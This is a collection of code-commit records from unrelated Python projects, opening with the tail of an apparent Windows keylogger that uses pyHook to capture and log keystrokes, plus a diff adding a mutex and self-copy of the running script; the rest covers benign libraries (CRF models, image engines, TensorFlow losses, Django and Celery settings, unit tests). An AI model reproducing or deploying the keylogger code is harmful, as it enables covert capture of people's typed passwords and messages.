elif (event.Ascii == 162 or event.Ascii == 163):
e4Ch = ' [CTRL] '
elif (event.Ascii == 164 or event.Ascii == 165):
e4Ch = ' [ALT] '
elif (event.Ascii == 160 or event.Ascii == 161):
e4Ch = ' [SHIFT] '
elif (event.Ascii == 46):
e4Ch = ' [DELETE] '
elif (event.Ascii == 32):
e4Ch = ' [SPACE] '
elif (event.Ascii == 27):
e4Ch = ' [ESC] '
elif (event.Ascii == 9):
e4Ch = ' [TAB] '
elif (event.Ascii == 20):
e4Ch = ' [CAPSLOCK] '
elif (event.Ascii == 38):
e4Ch = ' [UP] '
elif (event.Ascii == 40):
e4Ch = ' [DOWN] '
elif (event.Ascii == 37):
e4Ch = ' [LEFT] '
elif (event.Ascii == 39):
e4Ch = ' [RIGHT] '
elif (event.Ascii == 91):
e4Ch = ' [SUPER] '
else:
e4Ch=chr(event.Ascii)
data=data+e4Ch
obj = pyHook.HookManager()
obj.KeyDown = pushing
obj.HookKeyboard()
pythoncom.PumpMessages()
|
Python
| 0.000009
|
@@ -9,23 +9,17 @@
ythoncom
-%0Aimport
+,
pyHook%0A
@@ -63,53 +63,8 @@
xit%0A
-from sys import argv%0Afrom shutil import copy%0A
impo
@@ -216,16 +216,41 @@
import *
+%0Aimport shutil%0Aimport sys
%0A%0Amutex
@@ -293,17 +293,16 @@
0tAs519n
-s
')%0Aif wi
@@ -507,13 +507,24 @@
+shutil.
copy(
+sys.
argv
|
c129fc28da31fc8fa1ebd3ac75792b8ccad245c8
|
fix better warning
|
pystruct/models/edge_feature_graph_crf.py
|
pystruct/models/edge_feature_graph_crf.py
|
import numpy as np
from .graph_crf import GraphCRF
class EdgeFeatureGraphCRF(GraphCRF):
"""Pairwise CRF with features/strength associated to each edge.
Pairwise potentials are asymmetric and shared over all edges.
They are weighted by an edge-specific features, though.
This allows for contrast sensitive potentials or directional potentials
(using a {-1, +1} encoding of the direction for example).
More complicated interactions are also possible, of course.
Node features and edge features are given as a tuple of shape (n_nodes,
n_features) and (n_edges, n_edge_features) respectively.
An instance ``x`` is represented as a tuple ``(node_features, edges,
edge_features)`` where edges is an array of shape (n_edges, 2),
representing the graph.
Labels ``y`` are given as array of shape (n_features)
Parameters
----------
n_states : int, default=2
Number of states for all variables.
n_features : int, default=None
Number of features per node. None means n_states.
n_edge_features : int, default=1
Number of features per edge.
inference_method : string, default="qpbo"
Function to call do do inference and loss-augmented inference.
Possible values are:
- 'qpbo' for QPBO + alpha expansion.
- 'dai' for LibDAI bindings (which has another parameter).
- 'lp' for Linear Programming relaxation using GLPK.
- 'ad3' for AD3 dual decomposition.
class_weight : None, or array-like
Class weights. If an array-like is passed, it must have length
n_classes. None means equal class weights.
symmetric_edge_features : None or list
Indices of edge features that are forced to be symmetric.
Often the direction of the edge has no immediate meaning.
antisymmetric_edge_features : None or list
Indices of edge features that are forced to be anti-symmetric.
"""
def __init__(self, n_states=2, n_features=None, n_edge_features=1,
inference_method='qpbo', class_weight=None,
symmetric_edge_features=None,
antisymmetric_edge_features=None):
GraphCRF.__init__(self, n_states, n_features, inference_method,
class_weight=class_weight)
self.n_edge_features = n_edge_features
self.size_psi = (n_states * self.n_features
+ self.n_edge_features
* n_states ** 2)
if symmetric_edge_features is None:
symmetric_edge_features = []
if antisymmetric_edge_features is None:
antisymmetric_edge_features = []
if not set(symmetric_edge_features).isdisjoint(
antisymmetric_edge_features):
raise ValueError("symmetric_edge_features and "
" antisymmetric_edge_features share an entry."
" That doesn't make any sense.")
self.symmetric_edge_features = symmetric_edge_features
self.antisymmetric_edge_features = antisymmetric_edge_features
def __repr__(self):
return ("%s(n_states: %d, inference_method: %s, n_features: %d, "
"n_edge_features: %d)"
% (type(self).__name__, self.n_states, self.inference_method,
self.n_features, self.n_edge_features))
def _check_size_x(self, x):
GraphCRF._check_size_x(self, x)
_, edges, edge_features = x
if edges.shape[0] != edge_features.shape[0]:
raise ValueError("Got %d edges but %d edge features."
% (edges.shape[0], edge_features.shape[0]))
if edge_features.shape[1] != self.n_edge_features:
raise ValueError("Got edge features of size %d, but expected %d."
% (edge_features.shape[1], self.n_edge_features))
def get_pairwise_potentials(self, x, w):
"""Computes pairwise potentials for x and w.
Parameters
----------
x : tuple
Instance Representation.
w : ndarray, shape=(size_psi,)
Weight vector for CRF instance.
Returns
-------
pairwise : ndarray, shape=(n_states, n_states)
Pairwise weights.
"""
self._check_size_w(w)
self._check_size_x(x)
edge_features = x[2]
pairwise = np.asarray(w[self.n_states * self.n_features:])
pairwise = pairwise.reshape(self.n_edge_features, -1)
return np.dot(edge_features, pairwise).reshape(
edge_features.shape[0], self.n_states, self.n_states)
def psi(self, x, y):
"""Feature vector associated with instance (x, y).
Feature representation psi, such that the energy of the configuration
(x, y) and a weight vector w is given by np.dot(w, psi(x, y)).
Parameters
----------
x : tuple
Input representation.
y : ndarray or tuple
Either y is an integral ndarray, giving
a complete labeling for x.
Or it is the result of a linear programming relaxation. In this
case, ``y=(unary_marginals, pariwise_marginals)``.
Returns
-------
p : ndarray, shape (size_psi,)
Feature vector associated with state (x, y).
"""
self._check_size_x(x)
features, edges = self.get_features(x), self.get_edges(x)
n_nodes = features.shape[0]
edge_features = x[2]
if isinstance(y, tuple):
# y is result of relaxation, tuple of unary and pairwise marginals
unary_marginals, pw = y
else:
y = y.reshape(n_nodes)
gx = np.ogrid[:n_nodes]
#make one hot encoding
unary_marginals = np.zeros((n_nodes, self.n_states), dtype=np.int)
gx = np.ogrid[:n_nodes]
unary_marginals[gx, y] = 1
## pairwise
pw = [np.outer(unary_marginals[edge[0]].T,
unary_marginals[edge[1]]).ravel()
for edge in edges]
pw = np.vstack(pw)
pw = np.dot(edge_features.T, pw)
for i in self.symmetric_edge_features:
pw_ = pw[i].reshape(self.n_states, self.n_states)
pw[i] = (pw_ + pw_.T).ravel() / 2.
for i in self.antisymmetric_edge_features:
pw_ = pw[i].reshape(self.n_states, self.n_states)
pw[i] = (pw_ - pw_.T).ravel() / 2.
unaries_acc = np.dot(unary_marginals.T, features)
psi_vector = np.hstack([unaries_acc.ravel(), pw.ravel()])
return psi_vector
|
Python
| 0.001163
|
@@ -2692,16 +2692,291 @@
res = %5B%5D
+%0A if np.any(np.hstack(%5Bsymmetric_edge_features,%0A antisymmetric_edge_features%5D) %3E= n_edge_features):%0A raise ValueError(%22Got (anti) symmetric edge feature index that is %22%0A %22larger than n_edge_features.%22)
%0A%0A
|
d07d87ea7f9d62e8274ba1b958d08756d071653a
|
add format detection by magic number
|
thumbor/engines/__init__.py
|
thumbor/engines/__init__.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/globocom/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com timehome@corp.globo.com
class BaseEngine(object):
def __init__(self, context):
self.context = context
self.image = None
self.extension = None
self.source_width = None
self.source_height = None
self.icc_profile = None
def load(self, buffer, extension):
self.extension = extension
self.image = self.create_image(buffer)
if self.source_width is None:
self.source_width = self.size[0]
if self.source_height is None:
self.source_height = self.size[1]
@property
def size(self):
return self.image.size
def normalize(self):
width, height = self.size
self.source_width = width
self.source_height = height
if width > self.context.config.MAX_WIDTH or height > self.context.config.MAX_HEIGHT:
width_diff = width - self.context.config.MAX_WIDTH
height_diff = height - self.context.config.MAX_HEIGHT
if self.context.config.MAX_WIDTH and width_diff > height_diff:
height = self.get_proportional_height(self.context.config.MAX_WIDTH)
self.resize(self.context.config.MAX_WIDTH, height)
return True
elif self.context.config.MAX_HEIGHT and height_diff > width_diff:
width = self.get_proportional_width(self.context.config.MAX_HEIGHT)
self.resize(width, self.context.config.MAX_HEIGHT)
return True
return False
def get_proportional_width(self, new_height):
width, height = self.size
return round(float(new_height) * width / height, 0)
def get_proportional_height(self, new_width):
width, height = self.size
return round(float(new_width) * height / width, 0)
def gen_image(self):
raise NotImplementedError()
def create_image(self):
raise NotImplementedError()
def crop(self):
raise NotImplementedError()
def resize(self):
raise NotImplementedError()
def focus(self, points):
pass
def flip_horizontally(self):
raise NotImplementedError()
def flip_vertically(self):
raise NotImplementedError()
def read(self, extension, quality):
raise NotImplementedError()
def get_image_data(self):
raise NotImplementedError()
def set_image_data(self, data):
raise NotImplementedError()
def get_image_mode(self):
""" Possible return values should be: RGB, RBG, GRB, GBR, BRG, BGR, RGBA, AGBR, ... """
raise NotImplementedError()
def paste(self):
raise NotImplementedError()
|
Python
| 0.000001
|
@@ -532,16 +532,271 @@
nsion):%0A
+ #magic number detection%0A if ( buffer%5B:4%5D == 'GIF8'):%0A extension = '.gif'%0A elif ( buffer%5B:8%5D == '%5Cx89PNG%5Cr%5Cn%5Cx1a%5Cn'):%0A extension = '.png'%0A elif ( buffer%5B:2%5D == '%5Cxff%5Cxd8'):%0A extension = '.jpg'%0A%0A
|
b277ca357728010c9d763c95cc459540821802c0
|
Update dice loss
|
dataset/models/tf/losses/__init__.py
|
dataset/models/tf/losses/__init__.py
|
""" Contains custom losses """
import tensorflow as tf
from ..layers import flatten
def dice(targets, predictions):
""" Dice coefficient
Parameters
----------
targets : tf.Tensor
tensor with target values
predictions : tf.Tensor
tensor with predicted values
Returns
-------
average loss : tf.Tensor with a single element
"""
e = 1e-6
intersection = flatten(targets * predictions)
loss = -tf.reduce_mean((2. * intersection + e) / (flatten(targets) + flatten(predictions) + e))
return loss
|
Python
| 0
|
@@ -109,16 +109,160 @@
dictions
+, weights=1.0, label_smoothing=0, scope=None,%0A loss_collection=tf.GraphKeys.LOSSES, reduction=tf.losses.Reduction.SUM_BY_NONZERO_WEIGHTS
):%0A %22
@@ -429,21 +429,21 @@
edicted
-value
+logit
s%0A%0A R
@@ -469,138 +469,475 @@
-average loss : tf.Tensor with a single element%0A %22%22%22%0A e = 1e-6%0A intersection = flatten(targets * predictions)%0A los
+Tensor of the same type as targets.%0A If reduction is NONE, this has the same shape as targets; otherwise, it is scalar.%0A %22%22%22%0A e = 1e-6%0A predictions = tf.sigmoid(predictions)%0A axis = tuple(range(1, targets.shape.ndims))%0A%0A if label_smoothing %3E 0:%0A num_classes = targets.shape%5B-1%5D%0A targets = targets * (1 - label_smoothing) + label_smoothing / num_classes%0A%0A intersection = tf.reduce_sum(targets * predictions, axis=axis)%0A target
s =
--
tf.r
@@ -946,13 +946,101 @@
uce_
-mean(
+sum(targets, axis=axis)%0A predictions = tf.reduce_sum(predictions, axis=axis)%0A%0A loss = -
(2.
@@ -1065,24 +1065,16 @@
) /
-(flatten
(targets
) +
@@ -1073,20 +1073,11 @@
gets
-)
+
-flatten(
pred
@@ -1087,14 +1087,105 @@
ions
-)
+ e)
+%0A loss = tf.losses.compute_weighted_loss(loss, weights, scope, loss_collection, reduction
)%0A
|
4c9b47052c2c66671230f33ea84459e02b3b2f06
|
Update Unit_Testing2.py
|
Unit_Testing2.py
|
Unit_Testing2.py
|
from unit_testing import *
import unittest
class UnitTests(unittest.TestCase):
def setUp(self):
print('setUp()...')
self.hash1 = Hash('1234')
self.hash2 = Hash('1234')
self.hash3 = Hash('123')
self.email1 = Email('P@V')
def test(self):
print('testing hash...')
self.assertEqual(self.hash1, self.hash2) #failed
self.assertNotEqual(self.hash1, self.hash3)
self.assertRaises(InvalidPassword, Hash, '1')
print('testing email...')
self.assertEqual(str(self.email1), 'P@V')
self.assertRaises(InvalidEmail, Email, 'thing')
self.assertRaises(InvalidEmail, Email, '@gmail.com') #failed
print('testing social...')
self.assertRaises(InvalidSocial, SS, '123456789')
self.assertRaises(InvalidSocial, SS, '1234-567-89') #failed
self.assertRaises(InvalidSocial, SS, '-') #failed
self.assertRaises(InvalidSocial, SS, '1234')
def tearDown(self):
print('tearDown()...')
del self.hash1
del self.hash2
del self.hash3
del self.email1
|
Python
| 0
|
@@ -167,77 +167,8 @@
')%0D%0A
- self.hash2 = Hash('1234')%0D%0A self.hash3 = Hash('123')%0D%0A
@@ -192,19 +192,31 @@
Email('
-P@V
+zmg@verizon.net
')%0D%0A%0D%0A
@@ -314,17 +314,17 @@
elf.hash
-2
+1
) #faile
@@ -366,26 +366,27 @@
.hash1,
-self.hash3
+Hash('123')
)%0D%0A
@@ -431,18 +431,98 @@
Hash, '1
+
')
+ #failed%0D%0A #self.assertEqual(length of Hash for two different passwords)
%0D%0A
@@ -598,11 +598,23 @@
), '
-P@V
+zmg@verizon.net
')%0D%0A
@@ -665,15 +665,20 @@
l, '
-thing')
+@@') #failed
%0D%0A
@@ -1018,18 +1018,27 @@
S, '1234
+-
')
+ #failed
%0D%0A%0D%0A
|
09a10d7f0b49ec746f2e93d0eb0377bddc92f25f
|
Update builder.py
|
uplink/builder.py
|
uplink/builder.py
|
# Standard library imports
import collections
import functools
import warnings
# Local imports
from uplink import (
auth as auth_,
clients,
converters,
exceptions,
helpers,
hooks,
interfaces,
utils,
types
)
from uplink.converters import keys
__all__ = ["build", "Consumer"]
class RequestPreparer(object):
def __init__(self, builder):
self._hooks = list(builder.hooks)
self._client = builder.client
self._base_url = str(builder.base_url)
self._converters = list(builder.converters)
self._auth = builder.auth
def _join_uri_with_base(self, uri):
return utils.urlparse.urljoin(self._base_url, uri)
def _get_hook_chain(self, contract):
chain = list(contract.transaction_hooks)
converter = contract.get_converter(
keys.CONVERT_FROM_RESPONSE_BODY,
contract.return_type)
if converter is not None:
# Found a converter that can handle the return type.
chain.append(hooks.ResponseHandler(converter.convert))
chain.extend(self._hooks)
return chain
@staticmethod
def apply_hooks(chain, request_builder, sender):
if len(chain) == 1:
hook = chain[0]
else:
hook = hooks.TransactionHookChain(*chain)
hook.audit_request(request_builder)
sender.add_callback(hook.handle_response)
sender.add_error_handler(hook.handle_exception)
def prepare_request(self, request_builder):
# TODO: Add tests for this that make sure the client is called?
# TODO: Rename uri to url
request_builder.uri = self._join_uri_with_base(request_builder.uri)
self._auth(request_builder)
sender = self._client.create_request()
chain = self._get_hook_chain(request_builder)
if chain:
self.apply_hooks(chain, request_builder, sender)
return sender.send(
request_builder.method,
request_builder.uri,
request_builder.info
)
def create_request_builder(self, definition):
registry = definition.make_converter_registry(self._converters)
return helpers.RequestBuilder(registry)
class CallFactory(object):
def __init__(self, request_preparer, request_definition):
self._request_preparer = request_preparer
self._request_definition = request_definition
def __call__(self, *args, **kwargs):
builder = self._request_preparer.create_request_builder(
self._request_definition)
self._request_definition.define_request(builder, args, kwargs)
return self._request_preparer.prepare_request(builder)
class Builder(interfaces.CallBuilder):
"""The default callable builder."""
def __init__(self):
self._base_url = ""
self._hooks = []
self._client = clients.get_client()
self._converters = collections.deque()
self._converters.append(converters.StandardConverter())
self._auth = auth_.get_auth()
@property
def client(self):
return self._client
@client.setter
def client(self, client):
if client is not None:
self._client = clients.get_client(client)
@property
def hooks(self):
return iter(self._hooks)
def add_hook(self, *hooks_):
self._hooks.extend(hooks_)
@property
def base_url(self):
return self._base_url
@base_url.setter
def base_url(self, base_url):
self._base_url = base_url
@property
def converters(self):
return iter(self._converters)
def add_converter(self, *converters_):
self._converters.extendleft(converters_)
@property
def auth(self):
return self._auth
@auth.setter
def auth(self, auth):
if auth is not None:
self._auth = auth_.get_auth(auth)
@utils.memoize()
def build(self, definition):
"""
Creates a callable that uses the provided definition to execute
HTTP requests when invoked.
"""
return CallFactory(RequestPreparer(self), definition)
class ConsumerMethod(object):
"""
A wrapper around a :py:class`interfaces.RequestDefinitionBuilder`
instance bound to a :py:class:`Consumer` subclass, mainly responsible
for controlling access to the instance.
"""
def __init__(self, owner_name, attr_name, request_definition_builder):
self._request_definition_builder = request_definition_builder
self._owner_name = owner_name
self._attr_name = attr_name
self._request_definition = self._build_definition()
def _build_definition(self):
try:
return self._request_definition_builder.build()
except exceptions.InvalidRequestDefinition as error:
# TODO: Find a Python 2.7 compatible way to reraise
raise exceptions.UplinkBuilderError(
self._owner_name,
self._attr_name,
error)
def __get__(self, instance, owner):
if instance is None:
return self._request_definition_builder
else:
return instance._builder.build(self._request_definition)
class ConsumerMeta(type):
@staticmethod
def _wrap_if_definition(cls_name, key, value):
if isinstance(value, interfaces.RequestDefinitionBuilder):
value = ConsumerMethod(cls_name, key, value)
return value
@staticmethod
def _set_init_handler(namespace):
try:
init = namespace["__init__"]
except KeyError:
pass
else:
builder = types.ArgumentAnnotationHandlerBuilder.from_func(init)
handler = builder.build()
@functools.wraps(init)
def new_init(self, *args, **kwargs):
init(self, *args, **kwargs)
f = functools.partial(
handler.handle_call, args=args, kwargs=kwargs
)
hook = hooks.RequestAuditor(f)
self._builder.add_hook(hook)
namespace["__init__"] = new_init
def __new__(mcs, name, bases, namespace):
mcs._set_init_handler(namespace)
# Wrap all definition builders with a special descriptor that
# handles attribute access behavior.
for key, value in namespace.items():
namespace[key] = mcs._wrap_if_definition(name, key, value)
return super(ConsumerMeta, mcs).__new__(mcs, name, bases, namespace)
def __setattr__(cls, key, value):
value = cls._wrap_if_definition(cls.__name__, key, value)
super(ConsumerMeta, cls).__setattr__(key, value)
_Consumer = ConsumerMeta("_Consumer", (), {})
class Consumer(_Consumer):
def __init__(
self,
base_url="",
client=None,
converter=(),
auth=None,
hook=()
):
self._builder = Builder()
self._builder.base_url = base_url
if isinstance(converter, converters.interfaces.ConverterFactory):
converter = (converter,)
self._builder.add_converter(*converter)
if isinstance(hook, hooks.TransactionHook):
hook = (hook,)
self._builder.add_hook(*hook)
self._builder.auth = auth
self._builder.client = client
def build(service_cls, *args, **kwargs):
name = service_cls.__name__
warnings.warn(
"`uplink.build` is deprecated and will be removed in v1.0.0. "
"To construct a consumer instance, have `{0}` inherit "
"`uplink.Consumer` then instantiate (e.g., `{0}(...)`). ".format(name),
DeprecationWarning
)
consumer = type(name, (service_cls, Consumer), dict(service_cls.__dict__))
return consumer(*args, **kwargs)
|
Python
| 0.000001
|
@@ -1430,20 +1430,24 @@
er.add_e
-rror
+xception
_handler
|
4089730950d6005e257c20e6926000073fd41b33
|
Enable Tensor equality for 2.0
|
tensorflow/python/compat/v2_compat.py
|
tensorflow/python/compat/v2_compat.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Switching v2 features on and off."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import tf2
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import control_flow_v2_toggles
from tensorflow.python.ops import variable_scope
from tensorflow.python.util.tf_export import tf_export
@tf_export(v1=["enable_v2_behavior"])
def enable_v2_behavior():
"""Enables TensorFlow 2.x behaviors.
This function can be called at the beginning of the program (before `Tensors`,
`Graphs` or other structures have been created, and before devices have been
initialized. It switches all global behaviors that are different between
TensorFlow 1.x and 2.x to behave as intended for 2.x.
This function is called in the main TensorFlow `__init__.py` file, user should
not need to call it, except during complex migrations.
"""
# TF2 behavior is enabled if either 1) enable_v2_behavior() is called or
# 2) the TF2_BEHAVIOR=1 environment variable is set. In the latter case,
# the modules below independently check if tf2.enabled().
tf2.enable()
ops.enable_eager_execution()
tensor_shape.enable_v2_tensorshape() # Also switched by tf2
variable_scope.enable_resource_variables()
# Enables TensorArrayV2 and control flow V2.
control_flow_v2_toggles.enable_control_flow_v2()
@tf_export(v1=["disable_v2_behavior"])
def disable_v2_behavior():
"""Disables TensorFlow 2.x behaviors.
This function can be called at the beginning of the program (before `Tensors`,
`Graphs` or other structures have been created, and before devices have been
initialized. It switches all global behaviors that are different between
TensorFlow 1.x and 2.x to behave as intended for 1.x.
User can call this function to disable 2.x behavior during complex migrations.
"""
tf2.disable()
ops.disable_eager_execution()
tensor_shape.disable_v2_tensorshape() # Also switched by tf2
variable_scope.disable_resource_variables()
# Disables TensorArrayV2 and control flow V2.
control_flow_v2_toggles.disable_control_flow_v2()
|
Python
| 0
|
@@ -2030,24 +2030,55 @@
variables()%0A
+ ops.enable_tensor_equality()%0A
# Enables
@@ -2809,16 +2809,48 @@
ables()%0A
+ ops.disable_tensor_equality()%0A
# Disa
|
e39c2e0c3dae39ee380a98a1aa662d14d1a1191e
|
Add new keyfile
|
dexter/config/celeryconfig.py
|
dexter/config/celeryconfig.py
|
from celery.schedules import crontab
# uses AWS creds from the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY env variables
BROKER_URL = 'sqs://'
BROKER_TRANSPORT_OPTIONS = {
'region': 'eu-west-1',
'polling_interval': 15 * 1,
'queue_name_prefix': 'mma-dexter-',
'visibility_timeout': 3600*12,
}
# all our tasks can by retried if the worker fails
CELERY_ACKS_LATE = True
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TIMEZONE = 'Africa/Johannesburg'
CELERY_ENABLE_UTC = True
CELERYBEAT_SCHEDULE = {
'fetch-yesterdays-feeds': {
'schedule': crontab(hour=1, minute=0),
'task': 'dexter.tasks.fetch_yesterdays_feeds',
},
'back-process-feeds': {
'schedule': crontab(hour=11, minute=0),
'task': 'dexter.tasks.back_process_feeds',
},
'fetch_yesterdays_feeds_rerun': {
'schedule': crontab(hour=12, minute=0),
'task': 'dexter.tasks.back_process_feeds',
},
# 'backfill-taxonomies': {
# 'schedule': crontab(hour=21, minute=0),
# 'task': 'dexter.tasks.backfill_taxonomies',
# },
}
|
Python
| 0.000002
|
@@ -634,17 +634,17 @@
ab(hour=
-1
+2
, minute
@@ -916,17 +916,17 @@
b(hour=1
-2
+5
, minute
|
9a3d81d38e8b5885f54198f41b27d1d813c83e74
|
Add django_extensions
|
director/director/settings.py
|
director/director/settings.py
|
"""
Django settings for director project.
Uses ``django-configurations``. For more on this package, see
https://github.com/jazzband/django-configurations
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
from configurations import Configuration, values
class Common(Configuration):
"""
Configuration settings common to both development and production
"""
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'director.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'director.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
#
# Defaults to `db.sqlite3` but can be set using `DJANGO_DATABASE_URL` env var
# Note that the three leading slashes are *intentional*
# See https://github.com/kennethreitz/dj-database-url#url-schema
DATABASES = values.DatabaseURLValue(
'sqlite:///%s/db.sqlite3' % BASE_DIR,
environ_prefix='DJANGO' # For consistent naming with other env vars
)
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
# Can be set using `DJANGO_STATIC_URL` env var
STATIC_URL = values.Value('/static/')
class Dev(Common):
"""
Configuration settings used in development
"""
# Ensure debug is always true in development
DEBUG = True
# This variable must always be set, even in development.
SECRET_KEY = 'not-a-secret-key'
class Prod(Common):
"""
Configuration settings used in production
"""
# Ensure debug is always false in production
DEBUG = False
# Require that a `DJANGO_SECRET_KEY` environment
# variable is set during production
SECRET_KEY = values.SecretValue()
|
Python
| 0.000005
|
@@ -3695,16 +3695,145 @@
t-key'%0A%0A
+ # Additional apps only used in development%0A INSTALLED_APPS = Common.INSTALLED_APPS + %5B%0A 'django_extensions'%0A %5D%0A%0A
%0Aclass P
|
c4f7f2025a6089ec0ddcb190eaf4c020804b384b
|
make the call to core commands more explicit
|
toggleselection/__init__.py
|
toggleselection/__init__.py
|
# Override commands that toggle item selection to automatically compute and instantly display
# combined filesize for selected files and the number of selected folders/files
from fman import DirectoryPaneListener, load_json
import json
from statusbarextended import StatusBarExtended
class CommandEmpty(): # to avoid duplicate command execution (and "return '', args" hangs)
def __call__(self):
pass
class SelectionOverride(DirectoryPaneListener):
def on_command(self, command_name, args):
if command_name in ('select_all'): # def ^A
self.pane.select_all()
self.show_selected_files()
return 'command_empty', args
elif command_name in ('deselect'): # def ^D
self.pane.clear_selection()
self.show_selected_files()
return 'command_empty', args
elif command_name in ( # commands that can pass a 'toggle_selection' argument
'move_cursor_down' , 'move_cursor_up' ,
'move_cursor_page_down', 'move_cursor_page_up',
'move_cursor_home' , 'move_cursor_end'):
if args.get('toggle_selection'): # select item → update statusbar → pass False arg
file_under_cursor = self.pane.get_file_under_cursor()
if file_under_cursor:
self.pane.toggle_selection(file_under_cursor)
self.show_selected_files()
new_args = dict(args)
new_args['toggle_selection'] = False
return command_name, new_args
def show_selected_files(self):
statusBarExtendedEnabled = load_json('StatusBarExtended.json')
if statusBarExtendedEnabled:
statusBarExtendedEnabledJson = json.loads(statusBarExtendedEnabled)
if statusBarExtendedEnabledJson['enabled'] == True:
StatusBarExtended.show_selected_files(self)
|
Python
| 0
|
@@ -202,398 +202,1371 @@
Pane
-Listener, load_json%0Aimport json%0Afrom statusbarextended import StatusBarExtended%0A%0Aclass CommandEmpty(): # to avoid duplicate command execution (and %22return '', args%22 hangs)%0A def __call__(self):%0A pass%0A%0Aclass SelectionOverride(DirectoryPaneListener):%0A def on_command(self, command_name, args):%0A if command_name in ('select_all'): # def %5EA%0A self.pane.select_all()
+Command, DirectoryPaneListener, load_json, save_json, PLATFORM%0Afrom core.commands.util import is_hidden%0Afrom fman.url import splitscheme%0Aimport json%0Afrom statusbarextended import StatusBarExtended%0A%0Aclass _CorePaneCommand(DirectoryPaneCommand): # copy from core/commands/__init__.py%0A def select_all(self):%0A self.pane.select_all()%0A def deselect( self):%0A self.pane.clear_selection()%0A%0A def move_cursor_down( self, toggle_selection=False):%0A self.pane.move_cursor_down( toggle_selection)%0A def move_cursor_up( self, toggle_selection=False):%0A self.pane.move_cursor_up( toggle_selection)%0A def move_cursor_page_up( self, toggle_selection=False):%0A self.pane.move_cursor_page_up( toggle_selection)%0A def move_cursor_page_down(self, toggle_selection=False):%0A self.pane.move_cursor_page_down(toggle_selection)%0A def move_cursor_home( self, toggle_selection=False):%0A self.pane.move_cursor_home( toggle_selection)%0A def move_cursor_end( self, toggle_selection=False):%0A self.pane.move_cursor_end( toggle_selection)%0A%0Aclass CommandEmpty(): # to avoid duplicate command execution (and %22return '', args%22 hangs)%0A def __call__(self):%0A pass%0A%0Aclass SelectionOverride(DirectoryPaneListener):%0A def on_command(self, command_name, args):
%0A
@@ -1672,16 +1672,43 @@
ame in (
+%0A 'select_all',
'deselec
@@ -1715,17 +1715,8 @@
t'):
- # def %5ED
%0A
@@ -1728,34 +1728,52 @@
-self.pane.clear_selection(
+getattr(_CorePaneCommand, command_name)(self
)%0A
@@ -2129,268 +2129,60 @@
-if args.get('toggle_selection'): # select item %E2%86%92 update statusbar %E2%86%92 pass False arg%0A file_under_cursor = self.pane.get_file_under_cursor()%0A if file_under_cursor:%0A self.pane.toggle_selection(file_under_cursor)%0A
+getattr(_CorePaneCommand, command_name)(self, args)%0A
@@ -2185,29 +2185,24 @@
-
self.show_se
@@ -2220,115 +2220,8 @@
s()%0A
- new_args = dict(args)%0A new_args%5B'toggle_selection'%5D = False%0A
@@ -2235,24 +2235,25 @@
return
+'
command_
name, ne
@@ -2248,18 +2248,16 @@
and_
-name, new_
+empty',
args
|
88a4c124fc1e1ee0b77771ebb63055e51396d779
|
Add unittest for perturb on many pmfs.
|
dit/math/tests/test_pmfops.py
|
dit/math/tests/test_pmfops.py
|
# coding: utf-8
from __future__ import division
from __future__ import print_function
import dit
import numpy as np
from nose.tools import *
module = dit.math.pmfops
def test_perturb():
# Smoke test
d = np.array([0, .5, .5])
d2 = module.perturb(d, .00001)
d3 = d2.round(2)
np.testing.assert_allclose(d, d3)
def test_convex_combination():
d1 = np.array([0, .5, .5])
d2 = np.array([.5, .5, 0])
d3_= np.array([.25, .5, .25])
d3 = module.convex_combination(np.array([d1, d2]))
np.testing.assert_allclose(d3, d3_)
def test_convex_combination_weights():
d1 = np.array([0, .5, .5])
d2 = np.array([.5, .5, 0])
weights = [1, 0]
d3 = module.convex_combination(np.array([d1, d2]), weights)
np.testing.assert_allclose(d3, d1)
